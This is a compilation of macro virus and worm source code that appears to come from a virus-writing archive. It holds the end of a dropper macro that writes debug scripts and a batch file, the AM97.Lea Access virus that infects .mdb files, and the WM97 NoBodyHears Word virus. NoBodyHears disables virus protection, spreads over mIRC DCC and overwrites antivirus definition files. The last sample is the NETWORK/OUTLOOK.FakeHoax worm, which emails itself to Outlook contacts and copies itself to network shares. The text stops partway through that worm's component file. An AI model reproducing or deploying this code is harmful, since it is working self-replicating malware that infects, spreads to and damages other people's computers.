Print #3, "E 1020 DB 87 DC F3 C6 2B F1 33 37 A4 6D 84 19 F8 F0 77"
Print #3, "E 1030 31 F8 92 D4 EF 7F EE E6 3B 4B A7 E6 8B 8E 22 D3"
Print #3, "E 1040 CD 96 B9 A1 A4 B5 B5 AC DB F0 85 A9 DF FF 5C E8"
Print #3, "E 1050 CC E5 EF 8E 32 97 B8 9B 2D 73 C3 A5 FE BE 74 46"
Print #3, "E 1060 BE 30 F5 FB 9F 3B F9 D6 BE F4 DB 2B B8 1D 26 73"
Print #3, "E 1070 43 71 B2 DD 35 F2 EB 90 EA F5 3F 73 67 A5 6E 8D"
Print #3, "E 1080 3C 25 6D 93 BC FB 9A 4B DC 8C 9A A9 2D 7C 7B 05"
Print #3, "E 1090 9F FD 99 4B A7 7C 1B E6 CB 52 AF FF 59 B7 96 EA"
Print #3, "E 10A0 DE AA 43 9C C1 38 F9 A2 A3 F4 BC D8 9E 2A EB B3"
Print #3, "E 10B0 E7 B8 65 DF 9C 4F 6B 2F C2 A1 41 C6 4C F8 9F 65"
Print #3, "E 10C0 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF"
Print #3, "E 10D0 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 10E0 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 10F0 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 15 F9 9F"
Print #3, "E 1100 AF 96 6A FC CF D7 4B 25 FE E7 2B A6 0A FF F3 35"
Print #3, "E 1110 53 81 FF F9 AA A9 C0 FF 7C D5 54 E1 7F BE 66 2A"
Print #3, "E 1120 F1 3F 5F 31 D5 F8 9F AF 97 8A FC CF 57 0B FC CF"
Print #3, "E 1130 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 1140 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 1150 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 1160 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 1170 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 1180 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 1190 FE 67 19 F0 3F CB 80 FF 59 06 FB 9F F9 6F 80 03"
Print #3, "E 11A0 5E 88 CA CD E8 5B 36 CA 9E F9 CF 5A BC B4 E8 61"
Print #3, "E 11B0 CC 0D D6 2C 19 3B F2 9E DE EE D0 78 D4 1F 0C 47"
Print #3, "E 11C0 B7 77 F7 0F E3 F1 64 3A 9B CD E7 8B E5 72 B9 5A"
Print #3, "E 11D0 AD 99 8D 41 5F 5E AD 68 7C 31 9F CF 66 D3 C9 78"
Print #3, "E 11E0 FC 70 7F 77 3B 1A 0E FA 51 8F 1D 6C 2C 81 3D 1E"
Print #3, "E 11F0 76 DB F5 8A 5D C5 0F 77 A3 44 AE 76 DC 6F D7 4B"
Print #3, "E 1200 E3 2F 36 B6 62 F6 AD 6D 56 8B 99 96 B2 59 A5 F1"
Print #3, "E 1210 91 87 A8 2A 76 57 06 DA EA A6 1F 71 B3 5E 2D 17"
Print #3, "E 1220 B3 29 3D 25 3F 23 3D E5 70 30 E8 F7 A3 A8 D7 EB"
Print #3, "E 1230 85 59 E8 7A 14 F5 FB 83 C1 90 36 46 6F CD 64 3A"
Print #3, "E 1240 9D 2D 96 AB F5 C6 6E 2D BF B5 E5 8F 77 6F EF B8"
Print #3, "E 1250 C9 6D C9 A6 30 DE 5B F9 2F F6 BC 6A 92 3B A7 D9"
Print #3, "E 1260 9E 68 87 4C 7E 66 88 4F 0A F9 83 B9 D1 2D B7 27"
Print #3, "E 1270 2D D8 51 44 A9 D2 4B 75 8B F2 0B 29 C0 E1 C8 04"
Print #3, "E 1280 38 B1 01 2E 38 40 93 60 CC 8A E3 5B D8 F8 CC C6"
Print #3, "E 1290 8C 28 A5 A8 C7 0E BB D6 F9 F9 91 15 80 9B F5 92"
Print #3, "E 12A0 FD CF F7 B7 23 B6 75 76 5A 71 58 39 FF B3 49 74"
Print #3, "E 12B0 96 F3 3F EF B7 1C 29 BB 2B 39 D3 D0 3E E2 61 4F"
Print #3, "E 12C0 F9 51 7C F3 99 89 EF CE C6 17 71 7C 3A B5 C0 60"
Print #3, "E 12D0 13 A4 71 1B E0 9D 09 70 46 73 61 45 F9 ED 0F 76"
Print #3, "E 12E0 6B 43 9D D5 3D 77 A9 B2 29 EC C8 A7 2B 3C DB 74"
Print #3, "E 12F0 7E 66 B6 5D 46 AA 87 EC 9C D4 65 7C D7 03 EF E9"
Print #3, "E 1300 3C 01 C3 74 02 9A DF 19 3D A9 0D 30 89 50 5F E6"
Print #3, "E 1310 F8 16 1C 1F 6F 4C 3A FD D8 FF 4C 41 D1 1C E2 10"
Print #3, "E 1320 74 30 76 AE 25 33 AB 30 D9 D2 19 D9 8F 67 24 0F"
Print #3, "E 1330 65 92 67 77 AA 7D 44 9E 7E F3 CC 6F 2C 9E 7D 69"
Print #3, "E 1340 78 49 84 C9 0C 4C 67 C3 DC 4C 40 BD B5 FC D6 36"
Print #3, "E 1350 37 8B D8 75 6A F6 D6 7E 66 6F FD 1F 50 4B 01 02"
Print #3, "E 1360 14 00 14 00 00 00 08 00 38 51 9B 28 17 D3 09 49"
Print #3, "E 1370 36 12 00 00 36 F8 01 00 08 00 00 00 00 00 00 00"
Print #3, "E 1380 00 00 20 00 B6 81 00 00 00 00 6C 6F 67 6F 2E 53"
Print #3, "E 1390 59 53 50 4B 05 06 00 00 00 00 01 00 01 00 36 00"
Print #3, "E 13A0 00 00 5C 12 00 00 00 00"
Print #3, "RCX"
Print #3, "12A8"
Print #3, "W"
Print #3, "Q"
Close #3
End Sub

Sub CreateBat()
Open "c:\windows\hop_along.bat" For Output As #4
Print #4, "del c:\windows\logo.sys"
Print #4, "del c:\logo.sys"
Print #4, "cd c:\windows\"
Print #4, "debug < c:\windows\pkunzip.dbg"
Print #4, "debug < c:\windows\logo.dbg"
Print #4, "c:\windows\pkunzip.com logo.zip"
Print #4, "exit"
Close #4
End Sub

Sub Wait4Bat()
If Dir("c:\windows\logo.sys") = "" Then Wait4Bat
End Sub
Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Application.MacrovirusProtection = False
Dim FilesToGet, FilesToInfect, CodeBase As String
FilesToInfect = False
FilesToGet = Dir("*.mdb", vbNormal)
If FilesToGet <> "" Then
CodeBase = CurrentDb.Name
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
While FilesToGet <> "
FilesToGet = Dir
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
Wend
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 3) + 1 Then
MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide open."
End If
Exit_Payload:
End If
End Function
Attribute VB_Name = "NoBodyHears"
Sub AutoClose()
'******************************************************************
'WM97 NoBodyHears
'By AngelsKitten / [NuKE]
'Greetings to Evul, Knowdeth, Jackie twoflower, Foxz
'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RAiD,
'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM
'******************************************************************
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("NoBodyHears").Export "C:\VXD.dll"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Delete
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For ¢ = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = True
Next ¢
For ¢ = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = True
Next ¢
If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _
Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject
§.VBComponents.Import ("C:\VXD.dll")
On Error GoTo scriptoops
Open "C:\audio.vxd" For Output As #1
Print #1, "[script]"
Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"
Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n3=}"
Print #1, "n4="
Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n7=}"
Print #1, "n8="
Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"
Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"
Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"
Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"
Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"
Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"
Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"
Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"
Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"
Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"
Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"
Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"
Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"
Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"
Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"
Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"
Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"
Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"
Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"
Print #1, "n29=ON 1:connect: {"
Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"
Print #1, "n31=}"
Close #1
scriptoops:
On Error GoTo batoops
Open "c:\windows\WinStart.bat" For Output As #2
Print #2, "@Echo Off"
Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"
Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c:\windows\aboutme.doc >nul"
Close #2
batoops:
If Day(Now()) = 12 Then
SetAttr "C:\program files\AntiViral Toolkit Pro\*.avc", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3
Print #3, "NoBodyHears"
Close #3
SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4
Print #4, "NoBodyHears"
Close #4
SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\program files\mcafee\*.def" For Output As #5
Print #5, "NoBodyHears"
Close #5
SetAttr "C:\f-marco\*.def", vbReadOnly
Open "C:\f-macro\*.def" For Output As #6
Print #6, "NoBodyHears"
Close #6
End If
If Day(Now()) = Int(Rnd * 31) + 1 Then
With Assistant.NewBalloon
.Icon = msoIconTip
.Animation = msoAnimationGetArtsy
.Heading = "WM97 NoBodyHears"
.Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuKE]"
.Show
End With
ActiveDocument.Password = "NoBodyHears"
Shell "start http://www.avp.com.au/", vbHide
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SetAttr ("c:\VXD.dll"), vbHidden + vbSystem
End Sub
Sub AutoOpen()
Call AutoClose
End Sub
Sub AutoNew()
Call AutoClose
End Sub
Sub ViewVBCode()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub ViewCode()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub ToolsMacro()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub FileTemplates()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub HelpWordPerfectHelp()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
' Worm Name: NETWORK/OUTLOOK.FakeHoax
' Author: Zulu
' Origin: Argentina

' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network
' shares.
' The main code is a COM object written in XML and VBScript using Windows Script Component, so
' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object
' defined in XML) and then both call methods and change properties of that object, no real
' spreading code is in those files.
' The worm was written in this way to make it easier to port it to any other language, this
way
' I was able of creating a JSE and a VBE file without really porting the main code. Also, it's
' possible to create new versions using Delphi, Visual C++, or any other by using
"REGSVR32.EXE"
' to register the WSC file as a COM object before calling it's methods or changing it's
' properties.
' This worm was written to show how JSE and VBE files could be used in viruses/worms, since
' before this they where only used as auxiliary files (some versions of HTML.rahC by
1nternal and
' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or
later,
' it won't be good spreading itself at the time of writing this.
' Also, this was a good opportunity for using Windows Script Component for the first time
because
' it made possible to write a JScript and a VBScript version without needing to port the whole
' code, so this is also the first virus/worm using it's own COM object.
'
' Features:
'
' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address
book if
' the number of addresses is less than 101. If that number is more than 100 it will try to
' select 100 random addresses. Subject and body are always the same.
' - Network spreading. It will copy itself to the root of all shares (not only mapped drives),
' waiting for someone to run it.
' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending of the version) will
show a
' TXT file when run, so it will show what many users expect.
' This TXT file will show the Wobbler hoax (the reason of the worm's name), which is a
strange
' social engineering method for a real worm. Anyway, since this won't spread well because of
' other reasons, even if someone wants to spread it, I won't know if the hoax message is
good
' for this purpose. Message subject and body talk about important information in the TXT
file,
' but they don't talk about the hoax because this could cause fear in the user from
opening the
' file or maybe make the user remember about viruses and checking for double extensions.
' - It has a 1/5 probability of also sending other email to the same addresses of the email
' having the worm file. The body of this email will have a poem written in spanish.
' The reason of this is an unusual request from a friend, she wanted one of her poems to be
' included in a virus/worm.
' So, even if this means unnecessary bytes and even worse spreading capabilities, here it
is. :)
' - There is no need of AV products or removers after running the worm since Windows'
settings are
' not changed and all temporary files are deleted.
'
' Here is the JSE file without encoding:

G=new ActiveXObject("Scripting.FileSystemObject");
A=G.GetTempName().concat(".WSC");
S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
S.Write("<?XML version=\"1.0\"?>\r\n<component>\r\n <comment>\r\n
NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <public>\r\n <property name=\"AttachmentFile
\"/>\r\n <property name=\"TextFile\"/>\r\n <property name=\"WormFile\"/>\r\n
<method name=\"DelTempFiles\"/>\r\n <method name=\"NetworkSpreading\">\r\n
<parameter name=\"FileName\"/>\r\n </method>\r\n <method name=\"OutlookSpreading\
">\r\n <parameter name=\"Body\"/>\r\n <parameter name=\"MaxAmount\"/>\r\n
<parameter name=\"Subject\"/>\r\n </method>\r\n <method name=\"ShowText\">\r\n
<parameter name=\"Content\"/>\r\n </method>\r\n </public>\r\n <script language=\"
VBScript\">\r\n <![CDATA[\r\n Sub DelTempFiles\r\n On Error Resume Next\r\n
Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n If
FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True\r\n If
FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True\r\n Set FSO =
Nothing\r\n End Sub\r\n Sub NetworkSpreading(FileName)\r\n On Error Resume
Next\r\n Set Network = CreateObject(\"WScript.Network\")\r\n Set Shares =
Network.EnumNetworkDrives\r\n If Shares.Count > 0 Then\r\n Set FSO =
CreateObject(\"Scripting.FileSystemObject\")\r\n For Counter1 = 0 To Shares.Count -
1\r\n If Shares.Item(Counter1) <> \"\" Then FSO.CopyFile WormFile,
FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO =
Nothing\r\n End If\r\n Set Shares = Nothing\r\n Set Network = Nothing\r\n
End Sub\r\n Sub OutlookSpreading(MaxAmount, Subject, Body)\r\n On Error Resume
Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n FSO.CopyFile
WormFile, AttachmentFile\r\n Set FSO = Nothing\r\n Outlook = \"\"\r\n Set
Outlook = CreateObject(\"Outlook.Application\")\r\n If Outlook <> \"\" Then\r\n
Set MAPI = Outlook.GetNameSpace(\"MAPI\")\r\n For Each List In
MAPI.AddressLists\r\n If List.AddressEntries.Count > 0 Then\r\n Set
Email1 = Outlook.CreateItem(0)\r\n If List.AddressEntries.Count > MaxAmount
Then\r\n Dim Address()\r\n ReDim Address(MaxAmount -
1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0
To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount -
1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1
Then Address(Counter2) = -1\r\n Next\r\n Next\r\n
For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n
Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 =
Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2)
And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n
Next\r\n Next\r\n For Counter1 = 0 To MaxAmount -
1\r\n If Address(Counter1) <> -1 Then\r\n Set Entry =
List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n End If\r\n Next\r\n
Else\r\n For Counter1 = 1 To List.AddressEntries.Count\r\n Set
Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC =
Addresses\r\n Email1.Subject = Subject\r\n Email1.Body =
Body\r\n Email1.Attachments.Add AttachmentFile\r\n
Email1.DeleteAfterSubmit = True\r\n Email1.Send\r\n Set Email1 =
Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n
Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n
Email2.Subject = \"Alma\"\r\n Email2.Body = \"No alucines que te amo,\" &
Chr(13) & Chr(10) & \"cuando en realidad es solo\" & Chr(13) & Chr(10) & \"mi coraz\" &
Chr(243) & \"n qui\" & Chr(233) & \"n lo hace.\" & Chr(13) & Chr(10) & \"Porque como ya sabr\
" & Chr(225) & \"s,\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n no manda en mi vida
,\" & Chr(13) & Chr(10) & \"si as\" & Chr(237) & \" lo hiciera,\" & Chr(13) & Chr(10) & \"mi
alma estar\" & Chr(237) & \"a perdida.\"\r\n Email2.DeleteAfterSubmit =
True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End
If\r\n End If\r\n Next\r\n Set MAPI = Nothing\r\n Set Outlook
= Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error
Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set
File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n
File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell =
CreateObject(\"WScript.Shell\")\r\n WSHShell.Run(TextFile)\r\n Set WSHShell =
Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\n</component>\r\n")
S.Close();
F=GetObject("script:".concat(G.BuildPath(G.GetSpecialFolder(2),A)));
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.JSE");
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT");
F.WormFile=WScript.ScriptFullName;
F.ShowText("Thought you might be interested in this message. If you receive an\r\nemail with
a file called \"California\" do not open the file. The file\r\ncontains the \"WOBBLER\"
virus.\r\n\r\nThis information was announced yesterday morning by IBM. The statement\r\nsays
that ... \"This is a very dangerous virus, much worse than\r\n'Melissa' and there is NO
remedy for it at this time. Some very sick\r\nindividual has succeeded in using the reformat
function from Norton\r\nUtilities causing it to completely erase all documents on the
hard\r\ndrive. It has been designed to work with Netscape Navigator and\r\nMicrosoft
Internet Explorer. It destroys Macintosh and IBM compatible\r\ncomputers. This is a new,
very malicious virus and not many people\r\nknow about it at this time.\"\r\n\"Please pass
this warning file to everyone in your address book and\r\nshare it with all your online
friends ASAP so that the destruction it\r\ncan cause may be minimized.\"\r\n");
F.OutlookSpreading(100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information.");
F.NetworkSpreading("WOBBLER.TXT.JSE");
F.DelTempFiles();
G.DeleteFile(G.BuildPath(G.GetSpecialFolder(2),A),true);

' Here is the VBE file without encoding:

Set G=CreateObject("Scripting.FileSystemObject")
A=G.GetTempName&".WSC"
Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),True)
O=Chr(13)&Chr(10)
S.Write "<?XML version=""1.0""?>"&O&"<component>"&O&" <comment>"&O&"
NETWORK/OUTLOOK.FakeHoax"&O&" </comment>"&O&" <public>"&O&" <property
name=""AttachmentFile""/>"&O&" <property name=""TextFile""/>"&O&" <property
name=""WormFile""/>"&O&" <method name=""DelTempFiles""/>"&O&" <method
name=""NetworkSpreading"">"&O&" <parameter name=""FileName""/>"&O&" </method>"&O&
" <method name=""OutlookSpreading"">"&O&" <parameter name=""Body""/>"&O&"
<parameter name=""MaxAmount""/>"&O&" <parameter name=""Subject""/>"&O&" </method>"&O&
" <method name=""ShowText"">"&O&" <parameter name=""Content""/>"&O&" </method>"&O&
" </public>"&O&" <script language=""VBScript"">"&O&" <![CDATA["&O&" Sub DelTempFiles"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" If FSO.FileExists(AttachmentFile)
Then FSO.DeleteFile AttachmentFile, True"&O&" If FSO.FileExists(TextFile) Then
FSO.DeleteFile TextFile, True"&O&" Set FSO = Nothing"&O&" End Sub"&O&" Sub
NetworkSpreading(FileName)"&O&" On Error Resume Next"&O&" Set Network =
CreateObject(""WScript.Network"")"&O&" Set Shares = Network.EnumNetworkDrives"&O&"
If Shares.Count > 0 Then"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"
&O&" For Counter1 = 0 To Shares.Count - 1"&O&" If Shares.Item(Counter1) <>
"""" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)"&O&"
Next"&O&" Set FSO = Nothing"&O&" End If"&O&" Set Shares = Nothing"&O&"
Set Network = Nothing"&O&" End Sub"&O&" Sub OutlookSpreading(MaxAmount, Subject, Body)"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" FSO.CopyFile WormFile, AttachmentFile"
&O&" Set FSO = Nothing"&O&" Outlook = """""&O&" Set Outlook =
CreateObject(""Outlook.Application"")"&O&" If Outlook <> """" Then"&O&" Set MAPI
= Outlook.GetNameSpace(""MAPI"")"&O&" For Each List In MAPI.AddressLists"&O&
" If List.AddressEntries.Count > 0 Then"&O&" Set Email1 =
Outlook.CreateItem(0)"&O&" If List.AddressEntries.Count > MaxAmount Then"&O&
" Dim Address()"&O&" ReDim Address(MaxAmount - 1)"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&" For Counter1 =
0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O&
" If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1"&O&" Next"&O&" Next"&O&" For
Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1
+ 1 To MaxAmount - 1"&O&" If Address(Counter1) = Address(Counter2) And
Address(Counter1) <> -1 Then Address(Counter2) = -1"&O&" Next"&O&
" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&"
If Address(Counter1) <> -1 Then"&O&" Set Entry =
List.AddressEntries(Address(Counter1))"&O&" If Counter1 = 0 Then Addresses
= Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&"
Set Entry = Nothing"&O&" End If"&O&" Next"&O&" Else"&O
&" For Counter1 = 1 To List.AddressEntries.Count"&O&" Set Entry
= List.AddressEntries(Counter1)"&O&" If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set
Entry = Nothing"&O&" Next"&O&" End If"&O&" Email1.BCC =
Addresses"&O&" Email1.Subject = Subject"&O&" Email1.Body = Body"&O&
" Email1.Attachments.Add AttachmentFile"&O&" Email1.DeleteAfterSubmit
= True"&O&" Email1.Send"&O&" Set Email1 = Nothing"&O&"
Randomize"&O&" If Int(5 * Rnd) = 0 Then"&O&" Set Email2 =
Outlook.CreateItem(0)"&O&" Email2.BCC = Addresses"&O&"
Email2.Subject = ""Alma"""&O&" Email2.Body = ""No alucines que te amo,"" &
Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" &
Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya
sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n no manda en
mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(237) & "" lo hiciera,"" & Chr(13) & Chr(10)
& ""mi alma estar"" & Chr(237) & ""a perdida."""&O&" Email2.DeleteAfterSubmit =
True"&O&" Email2.Send"&O&" Set Email2 = Nothing"&O&"
End If"&O&" End If"&O&" Next"&O&" Set MAPI = Nothing"&O&" Set
Outlook = Nothing"&O&" End If"&O&" End Sub"&O&" Sub ShowText(Content)"&O&"
On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O&
" Set File = FSO.CreateTextFile(TextFile, True)"&O&" File.Write(Content)"&O&"
File.Close"&O&" Set File = Nothing"&O&" Set FSO = Nothing"&O&" Set WSHShell =
CreateObject(""WScript.Shell"")"&O&" WSHShell.Run(TextFile)"&O&" Set WSHShell =
Nothing"&O&" End Sub"&O&" ]]>"&O&" </script>"&O&"</component>"&O
S.Close
Set F=GetObject("script:"&G.BuildPath(G.GetSpecialFolder(2),A))
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.VBE")
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT")
F.WormFile=WScript.ScriptFullName
F.ShowText "Thought you might be interested in this message. If you receive an"&O&"email
with a file called ""California"" do not open the file. The file"&O&"contains the
""WOBBLER"" virus."&O&O&"This information was announced yesterday morning by IBM. The
statement"&O&"says that ... ""This is a very dangerous virus, much worse than"&O&"'Melissa'
and there is NO remedy for it at this time. Some very sick"&O&"individual has succeeded in
using the reformat function from Norton"&O&"Utilities causing it to completely erase all
documents on the hard"&O&"drive. It has been designed to work with Netscape Navigator and"&O&
"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible"&O&"computers. This
is a new, very malicious virus and not many people"&O&"know about it at this time."""&O&
"""Please pass this warning file to everyone in your address book and"&O&"share it with all
your online friends ASAP so that the destruction it"&O&"can cause may be minimized."""&O
F.OutlookSpreading 100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information."
F.NetworkSpreading "WOBBLER.TXT.VBE"
F.DelTempFiles
G.DeleteFile G.BuildPath(G.GetSpecialFolder(2),A),True

' Here is the WSC file (the COM object), I used spaces and "normal" variable names to make it
' easier to read:

<?XML version="1.0"?>
<component>
<comment>
NETWORK/OUTLOOK.FakeHoax
</comment>
<public>
<property name="AttachmentFile"/>
<property name="TextFile"/>
<property name="WormFile"/>
<method name="DelTempFiles"/>
<method name="NetworkSpreading">
<parameter name="FileName"/>
</method>
<method name="OutlookSpreading">
